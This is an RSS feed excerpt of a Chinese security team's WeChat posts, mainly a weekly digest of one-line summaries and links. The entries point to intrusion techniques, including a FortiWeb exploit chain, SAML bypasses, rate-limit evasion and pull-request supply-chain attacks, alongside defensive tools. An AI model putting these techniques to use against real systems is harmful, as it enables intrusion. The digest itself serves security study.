0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">附录：文末福利｜社区邀请码限量赠送</span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次我们准备了 10 个 AISS 社区邀请码。获取方式： 转发本文 + 点赞 + 评论区留言「申请邀请码」我们将从评论区中抽取 10 位朋友，私信发送邀请码。AISS 是专注 AI 安全的开放社区，涵盖大模型安全风险矩阵、知识库、案例库，欢迎 AI 安全研究者、开发者与企业安全团队加入共建。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011345" src="https://wechat2rss.xlab.app/img-proxy/?k=ad43d6b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCkO6RtFpnTZF5xdKibnQ3C1UEYWrOJuTyeIPnUia3vOOXEZ6wp9PoXWVOJBvAv6b3Hiaicdv2LiaSkONsZtetYfEHGicdDlODXjXHMD4%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011343" src="https://wechat2rss.xlab.app/img-proxy/?k=ed3ee2ee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCkhUgdVmvf3otpniaGJHwM28oYTlheibWgjsDlON4J4ic0XL1V7xPYMEKY1f7Wrt2CUjMlkK3Etn1bShOg0a99Q0SaguuWZibOZSgw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=452b30b4&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494999%26idx%3D1%26sn%3D8a33dea317d873ca1912b36c3fab507f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 23 Apr 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.4.11-4.17）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494984&amp;idx=1&amp;sn=ea46bd4807fef8f239f9ccf214502a09</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-04-17 18:00</span> <span style="display: inline-block;">天津</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f7acde9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCmbbXCQHfrQX5MIIXlibR0rTEB9ExqXMZvTB2TicvGRicAnMbibmCMibM3I5nMm0dMDbAQ78dzAva8hgia3nZFnZcU7nnlAAruWPgkvo%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="line-height: 1.6;letter-spacing: 0px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011308" data-ratio="0.4222222222222222" data-s="300,640" data-type="png" data-w="900" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=3403e83d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmmrE1f7ck28UZj7tHsGyedCBVmibTwiblNhUu4VSAsIzEb3UdXiatkNWXG5aroklXh0wLthrrosFvdq6h1uWicnOjzow5d5wHfkZg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内网渗透</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">使用mitmproxy设置透明代理环境，包括Linux网络命名空间、WiFi AP创建和Android系统证书安装</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.synacktiv.com/en/publications/mitmproxy-for-fun-and-profit-interception-and-analysis-of-application-traffic" target="_blank">https://www.synacktiv.com/en/publications/mitmproxy-for-fun-and-profit-interception-and-analysis-of-application-traffic</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">PortSwigger 研究团队发现 SAML 认证协议的新绕过方法，揭示身份验证机制的安全缺陷</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://portswigger.net/research/the-fragile-lock" target="_blank">https://portswigger.net/research/the-fragile-lock</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Angular 的 Auto-CSP 在构建时自动生成 CSP 配置，通过重写脚本标签和哈希内联脚本防御 XSS 攻击</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://bughunters.google.com/blog/effortless-web-security-secure-by-design-in-the-wild" target="_blank">https://bughunters.google.com/blog/effortless-web-security-secure-by-design-in-the-wild</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FortiWeb 8.0.2 存在认证绕过+路径遍历+任意文件上传漏洞链，可导致远程代码执行</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52502" target="_blank">https://www.exploit-db.com/exploits/52502</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">终端对抗</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析 AWS notyet 持久化，常规 IR 手段均失效，仅 SCP 策略可有效遏制</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://sonraisecurity.com/blog/fighting-eventual-consistency-based-persistence-an-analysis-of-notyet/" target="_blank">https://sonraisecurity.com/blog/fighting-eventual-consistency-based-persistence-an-analysis-of-notyet/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ip-rotate：PortSwigger 维护的 IP 轮换 Burp Suite 扩展，用于绕过基于 IP 的速率限制和检测机制</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/portswigger/ip-rotate" target="_blank">https://github.com/portswigger/ip-rotate</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">speakeasy：Mandiant 发布 Speakeasy v2.0.0b3，用于模拟恶意软件执行环境的开源工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/mandiant/speakeasy" target="_blank">https://github.com/mandiant/speakeasy</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="">mquire:实现Linux内存取证无需外部依赖，支持SSH、浏览器会话Cookie、Email、AWS等多种蜜罐令牌部署</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.trailofbits.com/2026/02/25/mquire-linux-memory-forensics-without-external-dependencies/" target="_blank">https://blog.trailofbits.com/2026/02/25/mquire-linux-memory-forensics-without-external-dependencies/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Datadog发布IDE-SHEPHERD工具，结合运行时防御与启发式检测分析IDE扩展元数据异常</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://securitylabs.datadoghq.com/articles/ide-shepherd-release-article/" target="_blank">https://securitylabs.datadoghq.com/articles/ide-shepherd-release-article/</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞相关</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GitHub分析开源漏洞趋势，预测2026年CVE数量将创纪录，AI模型提升漏洞发现能力</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.blog/security/supply-chain-security/a-year-of-open-source-vulnerability-trends-cves-advisories-and-malware/" target="_blank">https://github.blog/security/supply-chain-security/a-year-of-open-source-vulnerability-trends-cves-advisories-and-malware/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="">Jackalope：Google Project Zero 发布 Jackalope 二进制文件模糊测试工具，支持覆盖率引导的跨平台测试</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/googleprojectzero/Jackalope" target="_blank">https://github.com/googleprojectzero/Jackalope</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">vulnerable-mcp-servers-lab：Appsecco 发布包含漏洞的 MCP 服务器实验室，用于安全测试和漏洞研究</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/appsecco/vulnerable-mcp-servers-lab" target="_blank">https://github.com/appsecco/vulnerable-mcp-servers-lab</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">利用 AI 生成恶意 PR，通过 pull_request_target 发起供应链攻击，针对高价值项目</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.wiz.io/blog/six-accounts-one-actor-inside-the-prt-scan-supply-chain-campaign" target="_blank">https://www.wiz.io/blog/six-accounts-one-actor-inside-the-prt-scan-supply-chain-campaign</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AWS Security Agent采用多智能体架构实现自动化渗透测试，支持DVWA扫描</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a 